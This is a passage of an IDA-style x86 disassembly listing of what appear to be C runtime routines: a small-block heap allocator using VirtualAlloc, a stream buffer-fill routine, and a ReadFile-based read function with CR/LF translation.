; ---------------------------------------------------------------------------
loc_4186DE: ; CODE XREF: sub_418641+89�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc dword_47C964
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_4186F5: ; CODE XREF: sub_418641+6F�j
pop esi
pop edi
retn
sub_418641 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4186F8 proc near ; CODE XREF: sub_418ADD+15F�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov ecx, [ebp+arg_0]
mov eax, [ecx+8]
push ebx
push esi
mov esi, [ecx+10h]
push edi
xor ebx, ebx
jmp short loc_418710
; ---------------------------------------------------------------------------
loc_41870D: ; CODE XREF: sub_4186F8+1A�j
shl eax, 1
inc ebx
loc_418710: ; CODE XREF: sub_4186F8+13�j
test eax, eax
jge short loc_41870D
mov eax, ebx
imul eax, 204h
lea eax, [eax+esi+144h]
push 3Fh
mov [ebp+var_8], eax
pop edx
loc_418729: ; CODE XREF: sub_4186F8+3B�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_418729
push 4
mov edi, ebx
push 1000h
shl edi, 0Fh
add edi, [ecx+0Ch]
push 8000h
push edi
call ds:dword_420190 ; VirtualAlloc
test eax, eax
jnz short loc_41875C
or eax, 0FFFFFFFFh
jmp loc_4187F9
; ---------------------------------------------------------------------------
loc_41875C: ; CODE XREF: sub_4186F8+5A�j
lea edx, [edi+7000h]
cmp edi, edx
mov [ebp+var_4], edx
ja short loc_4187AC
mov ecx, edx
sub ecx, edi
shr ecx, 0Ch
lea eax, [edi+10h]
inc ecx
loc_418774: ; CODE XREF: sub_4186F8+AF�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea edx, [eax+0FFCh]
mov [eax], edx
lea edx, [eax-1004h]
mov dword ptr [eax-4], 0FF0h
mov [eax+4], edx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
dec ecx
jnz short loc_418774
mov edx, [ebp+var_4]
loc_4187AC: ; CODE XREF: sub_4186F8+6F�j
mov eax, [ebp+var_8]
add eax, 1F8h
lea ecx, [edi+0Ch]
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
xor edi, edi
inc edi
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_4187E9
or [eax+4], edi
loc_4187E9: ; CODE XREF: sub_4186F8+EC�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_4187F9: ; CODE XREF: sub_4186F8+5F�j
pop edi
pop esi
pop ebx
leave
retn
sub_4186F8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4187FE proc near ; CODE XREF: sub_414BBA+77�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov ecx, [ebp+arg_0]
mov eax, [ecx+10h]
push ebx
push esi
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov edx, edi
sub edx, [ecx+0Ch]
add esi, 17h
shr edx, 0Fh
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [edi-4]
and esi, 0FFFFFFF0h
dec ecx
cmp esi, ecx
lea edi, [ecx+edi-4]
mov ebx, [edi]
mov [ebp+arg_8], ecx
mov [ebp+var_4], ebx
jle loc_4189A0
test bl, 1
jnz loc_418999
add ebx, ecx
cmp esi, ebx
jg loc_418999
mov ecx, [ebp+var_4]
sar ecx, 4
dec ecx
cmp ecx, 3Fh
mov [ebp+var_8], ecx
jbe short loc_418873
push 3Fh
pop ecx
mov [ebp+var_8], ecx
loc_418873: ; CODE XREF: sub_4187FE+6D�j
mov ebx, [edi+4]
cmp ebx, [edi+8]
jnz short loc_4188BE
cmp ecx, 20h
mov ebx, 80000000h
jnb short loc_41889F
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_4188BE
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_4188BE
; ---------------------------------------------------------------------------
loc_41889F: ; CODE XREF: sub_4187FE+85�j
add ecx, 0FFFFFFE0h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_4188BE
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_4188BE: ; CODE XREF: sub_4187FE+7B�j
; sub_4187FE+98�j ...
mov ecx, [edi+8]
mov ebx, [edi+4]
mov [ecx+4], ebx
mov ecx, [edi+4]
mov edi, [edi+8]
mov [ecx+8], edi
mov ecx, [ebp+arg_8]
sub ecx, esi
add [ebp+var_4], ecx
cmp [ebp+var_4], 0
jle loc_418987
mov edi, [ebp+var_4]
mov ecx, [ebp+arg_4]
sar edi, 4
dec edi
cmp edi, 3Fh
lea ecx, [ecx+esi-4]
jbe short loc_4188F8
push 3Fh
pop edi
loc_4188F8: ; CODE XREF: sub_4187FE+F5�j
mov ebx, [ebp+var_C]
lea ebx, [ebx+edi*8]
mov [ebp+arg_8], ebx
mov ebx, [ebx+4]
mov [ecx+4], ebx
mov ebx, [ebp+arg_8]
mov [ecx+8], ebx
mov [ebx+4], ecx
mov ebx, [ecx+4]
mov [ebx+8], ecx
mov ebx, [ecx+4]
cmp ebx, [ecx+8]
jnz short loc_418975
mov cl, [edi+eax+4]
mov byte ptr [ebp+arg_8+3], cl
inc cl
cmp edi, 20h
mov [edi+eax+4], cl
jnb short loc_41894C
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_418944
mov ecx, edi
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_418944: ; CODE XREF: sub_4187FE+136�j
lea eax, [eax+edx*4+44h]
mov ecx, edi
jmp short loc_41896C
; ---------------------------------------------------------------------------
loc_41894C: ; CODE XREF: sub_4187FE+130�j
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_418962
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_418962: ; CODE XREF: sub_4187FE+152�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [edi-20h]
loc_41896C: ; CODE XREF: sub_4187FE+14C�j
mov edx, 80000000h
shr edx, cl
or [eax], edx
loc_418975: ; CODE XREF: sub_4187FE+11E�j
mov edx, [ebp+arg_4]
mov ecx, [ebp+var_4]
lea eax, [edx+esi-4]
mov [eax], ecx
mov [ecx+eax-4], ecx
jmp short loc_41898A
; ---------------------------------------------------------------------------
loc_418987: ; CODE XREF: sub_4187FE+DE�j
mov edx, [ebp+arg_4]
loc_41898A: ; CODE XREF: sub_4187FE+187�j
lea eax, [esi+1]
mov [edx-4], eax
mov [edx+esi-8], eax
jmp loc_418AD5
; ---------------------------------------------------------------------------
loc_418999: ; CODE XREF: sub_4187FE+50�j
; sub_4187FE+5A�j
xor eax, eax
jmp loc_418AD8
; ---------------------------------------------------------------------------
loc_4189A0: ; CODE XREF: sub_4187FE+47�j
jge loc_418AD5
mov ebx, [ebp+arg_4]
sub [ebp+arg_8], esi
lea ecx, [esi+1]
mov [ebx-4], ecx
lea ebx, [ebx+esi-4]
mov esi, [ebp+arg_8]
sar esi, 4
dec esi
cmp esi, 3Fh
mov [ebp+arg_4], ebx
mov [ebx-4], ecx
jbe short loc_4189CB
push 3Fh
pop esi
loc_4189CB: ; CODE XREF: sub_4187FE+1C8�j
test byte ptr [ebp+var_4], 1
jnz loc_418A55
mov esi, [ebp+var_4]
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_4189E4
push 3Fh
pop esi
loc_4189E4: ; CODE XREF: sub_4187FE+1E1�j
mov ecx, [edi+4]
cmp ecx, [edi+8]
jnz short loc_418A2E
cmp esi, 20h
mov ebx, 80000000h
jnb short loc_418A0F
mov ecx, esi
shr ebx, cl
lea esi, [esi+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [esi]
jnz short loc_418A2B
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_418A2B
; ---------------------------------------------------------------------------
loc_418A0F: ; CODE XREF: sub_4187FE+1F6�j
lea ecx, [esi-20h]
shr ebx, cl
lea ecx, [esi+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_418A2B
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_418A2B: ; CODE XREF: sub_4187FE+208�j
; sub_4187FE+20F�j ...
mov ebx, [ebp+arg_4]
loc_418A2E: ; CODE XREF: sub_4187FE+1EC�j
mov ecx, [edi+8]
mov esi, [edi+4]
mov [ecx+4], esi
mov esi, [edi+8]
mov ecx, [edi+4]
mov [ecx+8], esi
mov esi, [ebp+arg_8]
add esi, [ebp+var_4]
mov [ebp+arg_8], esi
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_418A55
push 3Fh
pop esi
loc_418A55: ; CODE XREF: sub_4187FE+1D1�j
; sub_4187FE+252�j
mov ecx, [ebp+var_C]
lea ecx, [ecx+esi*8]
mov edi, [ecx+4]
mov [ebx+8], ecx
mov [ebx+4], edi
mov [ecx+4], ebx
mov ecx, [ebx+4]
mov [ecx+8], ebx
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_418ACC
mov cl, [esi+eax+4]
mov byte ptr [ebp+arg_4+3], cl
inc cl
cmp esi, 20h
mov [esi+eax+4], cl
jnb short loc_418AA3
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_418A9B
mov ecx, esi
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx], edi
loc_418A9B: ; CODE XREF: sub_4187FE+28D�j
lea eax, [eax+edx*4+44h]
mov ecx, esi
jmp short loc_418AC3
; ---------------------------------------------------------------------------
loc_418AA3: ; CODE XREF: sub_4187FE+287�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_418AB9
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx+4], edi
loc_418AB9: ; CODE XREF: sub_4187FE+2A9�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [esi-20h]
loc_418AC3: ; CODE XREF: sub_4187FE+2A3�j
mov edx, 80000000h
shr edx, cl
or [eax], edx
loc_418ACC: ; CODE XREF: sub_4187FE+275�j
mov eax, [ebp+arg_8]
mov [ebx], eax
mov [eax+ebx-4], eax
loc_418AD5: ; CODE XREF: sub_4187FE+196�j
; sub_4187FE:loc_4189A0�j
xor eax, eax
inc eax
loc_418AD8: ; CODE XREF: sub_4187FE+19D�j
pop edi
pop esi
pop ebx
leave
retn
sub_4187FE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418ADD proc near ; CODE XREF: sub_414BBA+89�p
; sub_414DD6+2D�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov ecx, [ebp+arg_0]
mov eax, dword_47C964
mov edx, dword_47C968
add ecx, 17h
and ecx, 0FFFFFFF0h
push ebx
mov [ebp+var_10], ecx
sar ecx, 4
push esi
lea eax, [eax+eax*4]
push edi
dec ecx
cmp ecx, 20h
lea edi, [edx+eax*4]
mov [ebp+var_4], edi
jge short loc_418B1A
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
jmp short loc_418B27
; ---------------------------------------------------------------------------
loc_418B1A: ; CODE XREF: sub_418ADD+30�j
add ecx, 0FFFFFFE0h
or eax, 0FFFFFFFFh
xor esi, esi
shr eax, cl
mov [ebp+var_8], eax
loc_418B27: ; CODE XREF: sub_418ADD+3B�j
mov eax, dword_47C970
mov ebx, eax
mov [ebp+var_C], esi
cmp ebx, edi
jmp short loc_418B49
; ---------------------------------------------------------------------------
loc_418B35: ; CODE XREF: sub_418ADD+6F�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_418B4E
add ebx, 14h
cmp ebx, [ebp+var_4]
loc_418B49: ; CODE XREF: sub_418ADD+56�j
mov [ebp+arg_0], ebx
jb short loc_418B35
loc_418B4E: ; CODE XREF: sub_418ADD+64�j
cmp ebx, [ebp+var_4]
jnz short loc_418B77
mov ebx, edx
jmp short loc_418B68
; ---------------------------------------------------------------------------
loc_418B57: ; CODE XREF: sub_418ADD+90�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_418B6F
add ebx, 14h
loc_418B68: ; CODE XREF: sub_418ADD+78�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jb short loc_418B57
loc_418B6F: ; CODE XREF: sub_418ADD+86�j
cmp ebx, eax
jz loc_418C0B
loc_418B77: ; CODE XREF: sub_418ADD+74�j
; sub_418ADD+170�j
mov dword_47C970, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_418B9E
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_418BD4
loc_418B9E: ; CODE XREF: sub_418ADD+AB�j
mov edx, [eax+0C4h]
and edx, [ebp+var_8]
and [ebp+var_4], 0
lea ecx, [eax+44h]
mov esi, [ecx]
and esi, [ebp+var_C]
or edx, esi
mov esi, [ebp+var_C]
jnz short loc_418BD1
loc_418BBA: ; CODE XREF: sub_418ADD+F2�j
mov edx, [ecx+84h]
and edx, [ebp+var_8]
inc [ebp+var_4]
add ecx, 4
mov edi, [ecx]
and edi, esi
or edx, edi
jz short loc_418BBA
loc_418BD1: ; CODE XREF: sub_418ADD+DB�j
mov edx, [ebp+var_4]
loc_418BD4: ; CODE XREF: sub_418ADD+BF�j
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
xor edi, edi
and ecx, esi
jnz short loc_418C5D
mov ecx, [eax+edx*4+0C4h]
and ecx, [ebp+var_8]
push 20h
pop edi
jmp short loc_418C5D
; ---------------------------------------------------------------------------
loc_418BFF: ; CODE XREF: sub_418ADD+131�j
cmp dword ptr [ebx+8], 0
jnz short loc_418C10
add ebx, 14h
mov [ebp+arg_0], ebx
loc_418C0B: ; CODE XREF: sub_418ADD+94�j
cmp ebx, [ebp+var_4]
jb short loc_418BFF
loc_418C10: ; CODE XREF: sub_418ADD+126�j
cmp ebx, [ebp+var_4]
jnz short loc_418C3B
mov ebx, edx
jmp short loc_418C22
; ---------------------------------------------------------------------------
loc_418C19: ; CODE XREF: sub_418ADD+14A�j
cmp dword ptr [ebx+8], 0
jnz short loc_418C29
add ebx, 14h
loc_418C22: ; CODE XREF: sub_418ADD+13A�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jb short loc_418C19
loc_418C29: ; CODE XREF: sub_418ADD+140�j
cmp ebx, eax
jnz short loc_418C3B
call sub_418641
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jz short loc_418C53
loc_418C3B: ; CODE XREF: sub_418ADD+136�j
; sub_418ADD+14E�j
push ebx
call sub_4186F8
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jnz loc_418B77
loc_418C53: ; CODE XREF: sub_418ADD+15C�j
xor eax, eax
jmp loc_418DD4
; ---------------------------------------------------------------------------
loc_418C5A: ; CODE XREF: sub_418ADD+182�j
shl ecx, 1
inc edi
loc_418C5D: ; CODE XREF: sub_418ADD+111�j
; sub_418ADD+120�j
test ecx, ecx
jge short loc_418C5A
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
sar esi, 4
dec esi
cmp esi, 3Fh
mov [ebp+var_8], ecx
jle short loc_418C7E
push 3Fh
pop esi
loc_418C7E: ; CODE XREF: sub_418ADD+19C�j
cmp esi, edi
jz loc_418D87
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_418CEA
cmp edi, 20h
mov ebx, 80000000h
jge short loc_418CBE
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_418CE7
mov ecx, [ebp+var_14]
mov ebx, [ebp+arg_0]
and [ebx], ecx
jmp short loc_418CEA
; ---------------------------------------------------------------------------
loc_418CBE: ; CODE XREF: sub_418ADD+1B9�j
lea ecx, [edi-20h]
shr ebx, cl
mov ecx, [ebp+var_4]
lea ecx, [eax+ecx*4+0C4h]
lea edi, [eax+edi+4]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_418CE7
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_418CEA
; ---------------------------------------------------------------------------
loc_418CE7: ; CODE XREF: sub_418ADD+1D5�j
; sub_418ADD+1FD�j
mov ebx, [ebp+arg_0]
loc_418CEA: ; CODE XREF: sub_418ADD+1AF�j
; sub_418ADD+1DF�j ...
cmp [ebp+var_8], 0
mov ecx, [edx+8]
mov edi, [edx+4]
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_418D93
mov ecx, [ebp+var_C]
lea ecx, [ecx+esi*8]
mov edi, [ecx+4]
mov [edx+8], ecx
mov [edx+4], edi
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_418D84
mov cl, [esi+eax+4]
mov byte ptr [ebp+arg_0+3], cl
inc cl
cmp esi, 20h
mov [esi+eax+4], cl
jge short loc_418D5B
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_418D49
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_418D49: ; CODE XREF: sub_418ADD+25F�j
mov ecx, esi
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_418D84
; ---------------------------------------------------------------------------
loc_418D5B: ; CODE XREF: sub_418ADD+259�j
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_418D6E
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_418D6E: ; CODE XREF: sub_418ADD+282�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_418D84: ; CODE XREF: sub_418ADD+247�j
; sub_418ADD+27C�j
mov ecx, [ebp+var_8]
loc_418D87: ; CODE XREF: sub_418ADD+1A3�j
test ecx, ecx
jz short loc_418D96
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_418D96
; ---------------------------------------------------------------------------
loc_418D93: ; CODE XREF: sub_418ADD+223�j
mov ecx, [ebp+var_8]
loc_418D96: ; CODE XREF: sub_418ADD+2AC�j
; sub_418ADD+2B4�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_418DCC
cmp ebx, dword_47C960
jnz short loc_418DCC
mov ecx, [ebp+var_4]
cmp ecx, dword_47C978
jnz short loc_418DCC
and dword_47C960, 0
loc_418DCC: ; CODE XREF: sub_418ADD+2D3�j
; sub_418ADD+2DB�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_418DD4: ; CODE XREF: sub_418ADD+178�j
pop edi
pop esi
pop ebx
leave
retn
sub_418ADD endp
; =============== S U B R O U T I N E =======================================
sub_418DD9 proc near ; CODE XREF: sub_414A85+AA�p
; sub_415E55+44�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz loc_418EB5
test al, 40h
jnz loc_418EB5
test al, 2
jz short loc_418E00
or eax, 20h
mov [esi+0Ch], eax
jmp loc_418EB5
; ---------------------------------------------------------------------------
loc_418E00: ; CODE XREF: sub_418DD9+1A�j
or eax, 1
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_418E15
push esi
call sub_41C18B
pop ecx
jmp short loc_418E1A
; ---------------------------------------------------------------------------
loc_418E15: ; CODE XREF: sub_418DD9+31�j
mov eax, [esi+8]
mov [esi], eax
loc_418E1A: ; CODE XREF: sub_418DD9+3A�j
push dword ptr [esi+18h]
push dword ptr [esi+8]
push dword ptr [esi+10h]
call sub_419087
add esp, 0Ch
test eax, eax
mov [esi+4], eax
jz short loc_418EA4
cmp eax, 0FFFFFFFFh
jz short loc_418EA4
mov edx, [esi+0Ch]
test dl, 82h
jnz short loc_418E79
mov ecx, [esi+10h]
cmp ecx, 0FFFFFFFFh
push edi
jz short loc_418E5F
mov edi, ecx
sar edi, 5
mov edi, dword_47C620[edi*4]
and ecx, 1Fh
lea ecx, [ecx+ecx*8]
lea edi, [edi+ecx*4]
jmp short loc_418E64
; ---------------------------------------------------------------------------
loc_418E5F: ; CODE XREF: sub_418DD9+6D�j
mov edi, offset dword_42E0D0
loc_418E64: ; CODE XREF: sub_418DD9+84�j
mov cl, [edi+4]
and cl, 82h
cmp cl, 82h
pop edi
jnz short loc_418E79
or edx, 2000h
mov [esi+0Ch], edx
loc_418E79: ; CODE XREF: sub_418DD9+64�j
; sub_418DD9+95�j
cmp dword ptr [esi+18h], 200h
jnz short loc_418E96
mov ecx, [esi+0Ch]
test cl, 8
jz short loc_418E96
test ch, 4
jnz short loc_418E96
mov dword ptr [esi+18h], 1000h
loc_418E96: ; CODE XREF: sub_418DD9+A7�j
; sub_418DD9+AF�j ...
mov ecx, [esi]
dec eax
mov [esi+4], eax
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_418EA4: ; CODE XREF: sub_418DD9+57�j
; sub_418DD9+5C�j
neg eax
sbb eax, eax
and eax, 10h
add eax, 10h
or [esi+0Ch], eax
and dword ptr [esi+4], 0
loc_418EB5: ; CODE XREF: sub_418DD9+A�j
; sub_418DD9+12�j ...
or eax, 0FFFFFFFFh
pop esi
retn
sub_418DD9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418EBA proc near ; CODE XREF: sub_419087+52�p
; sub_41D55D+2A7�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
and [ebp+var_8], 0
cmp [ebp+arg_8], 0
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
mov edx, ebx
jz loc_419080
mov eax, [ebp+arg_0]
mov ecx, eax
and eax, 1Fh
sar ecx, 5
lea esi, [eax+eax*8]
lea edi, ds:47C620h[ecx*4]
mov eax, [edi]
shl esi, 2
add eax, esi
mov cl, [eax+4]
test cl, 2
jnz loc_419080
test cl, 48h
jz short loc_418F20
mov al, [eax+5]
cmp al, 0Ah
jz short loc_418F20
dec [ebp+arg_8]
mov [ebx], al
mov eax, [edi]
lea edx, [ebx+1]
mov [ebp+var_8], 1
mov byte ptr [eax+esi+5], 0Ah
loc_418F20: ; CODE XREF: sub_418EBA+47�j
; sub_418EBA+4E�j
push 0
lea eax, [ebp+var_C]
push eax
push [ebp+arg_8]
mov eax, [edi]
push edx
push dword ptr [eax+esi]
call ds:dword_42008C ; ReadFile
test eax, eax
jnz short loc_418F72
call ds:dword_420008 ; RtlGetLastWin32Error
push 5
pop esi
cmp eax, esi
jnz short loc_418F5A
call sub_419600
mov dword ptr [eax], 9
call sub_419609
mov [eax], esi
jmp short loc_418F6A
; ---------------------------------------------------------------------------
loc_418F5A: ; CODE XREF: sub_418EBA+8A�j
cmp eax, 6Dh
jz loc_419080
push eax
call sub_419612
pop ecx
loc_418F6A: ; CODE XREF: sub_418EBA+9E�j
or eax, 0FFFFFFFFh
jmp loc_419082
; ---------------------------------------------------------------------------
loc_418F72: ; CODE XREF: sub_418EBA+7D�j
mov eax, [edi]
mov edx, [ebp+var_C]
add [ebp+var_8], edx
lea ecx, [eax+esi+4]
mov al, [ecx]
test al, al
jns loc_41907B
test edx, edx
jz short loc_418F95
cmp byte ptr [ebx], 0Ah
jnz short loc_418F95
or al, 4
jmp short loc_418F97
; ---------------------------------------------------------------------------
loc_418F95: ; CODE XREF: sub_418EBA+D0�j
; sub_418EBA+D5�j
and al, 0FBh
loc_418F97: ; CODE XREF: sub_418EBA+D9�j
mov [ecx], al
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_8]
add ecx, eax
cmp eax, ecx
mov [ebp+arg_8], eax
mov [ebp+var_8], ecx
jnb loc_419075
loc_418FAF: ; CODE XREF: sub_418EBA+1A3�j
mov eax, [ebp+arg_8]
mov al, [eax]
cmp al, 1Ah
jz loc_419065
cmp al, 0Dh
jz short loc_418FCB
mov [ebx], al
inc ebx
inc [ebp+arg_8]
jmp loc_419057
; ---------------------------------------------------------------------------
loc_418FCB: ; CODE XREF: sub_418EBA+104�j
dec ecx
cmp [ebp+arg_8], ecx
jnb short loc_418FE5
mov eax, [ebp+arg_8]
inc eax
cmp byte ptr [eax], 0Ah
jnz short loc_418FE0
add [ebp+arg_8], 2
jmp short loc_419039
; ---------------------------------------------------------------------------
loc_418FE0: ; CODE XREF: sub_418EBA+11E�j
mov [ebp+arg_8], eax
jmp short loc_419053
; ---------------------------------------------------------------------------
loc_418FE5: ; CODE XREF: sub_418EBA+115�j
inc [ebp+arg_8]
push 0
lea eax, [ebp+var_C]
push eax
push 1
lea eax, [ebp+var_1]
push eax
mov eax, [edi]
push dword ptr [eax+esi]
call ds:dword_42008C ; ReadFile
test eax, eax
jnz short loc_41900D
call ds:dword_420008 ; RtlGetLastWin32Error
test eax, eax
jnz short loc_419053
loc_41900D: ; CODE XREF: sub_418EBA+147�j
cmp [ebp+var_C], 0
jz short loc_419053
mov eax, [edi]
test byte ptr [eax+esi+4], 48h
jz short loc_41902E
mov al, [ebp+var_1]
cmp al, 0Ah
jz short loc_419039
mov byte ptr [ebx], 0Dh
mov ecx, [edi]
mov [ecx+esi+5], al
jmp short loc_419056
; ---------------------------------------------------------------------------
loc_41902E: ; CODE XREF: sub_418EBA+160�j
cmp ebx, [ebp+arg_4]
jnz short loc_41903E
cmp [ebp+var_1], 0Ah
jnz short loc_41903E
loc_419039: ; CODE XREF: sub_418EBA+124�j
; sub_418EBA+167�j
mov byte ptr [ebx], 0Ah
jmp short loc_419056
; ---------------------------------------------------------------------------
loc_41903E: ; CODE XREF: sub_418EBA+177�j
; sub_418EBA+17D�j
push 1
push 0FFFFFFFFh
push [ebp+arg_0]
call sub_41B348
add esp, 0Ch
cmp [ebp+var_1], 0Ah
jz short loc_419057
loc_419053: ; CODE XREF: sub_418EBA+129�j
; sub_418EBA+151�j ...
mov byte ptr [ebx], 0Dh
loc_419056: ; CODE XREF: sub_418EBA+172�j
; sub_418EBA+182�j
inc ebx
loc_419057: ; CODE XREF: sub_418EBA+10C�j
; sub_418EBA+197�j
mov ecx, [ebp+var_8]
cmp [ebp+arg_8], ecx
jb loc_418FAF
jmp short loc_419075
; ---------------------------------------------------------------------------
loc_419065: ; CODE XREF: sub_418EBA+FC�j
mov eax, [edi]
lea esi, [eax+esi+4]
mov al, [esi]
test al, 40h
jnz short loc_419075
or al, 2
mov [esi], al
loc_419075: ; CODE XREF: sub_418EBA+EF�j
; sub_418EBA+1A9�j ...
sub ebx, [ebp+arg_4]
mov [ebp+var_8], ebx
loc_41907B: ; CODE XREF: sub_418EBA+C8�j
mov eax, [ebp+var_8]
jmp short loc_419082
; ---------------------------------------------------------------------------
loc_419080: ; CODE XREF: sub_418EBA+16�j
; sub_418EBA+3E�j ...
xor eax, eax
loc_419082: ; CODE XREF: sub_418EBA+B3�j
; sub_418EBA+1C4�j
pop edi
pop esi
pop ebx
leave
retn
sub_418EBA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419087 proc near ; CODE XREF: sub_414A85+91�p
; sub_418DD9+4A�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 00419116 SIZE 0000001C BYTES
push 0Ch
push offset stru_429040
call __SEH_prolog
mov ebx, [ebp+arg_0]
cmp ebx, dword_47C618
jnb short loc_419116
mov eax, ebx
sar eax, 5
lea edi, ds:47C620h[eax*4]
mov eax, ebx
and eax, 1Fh
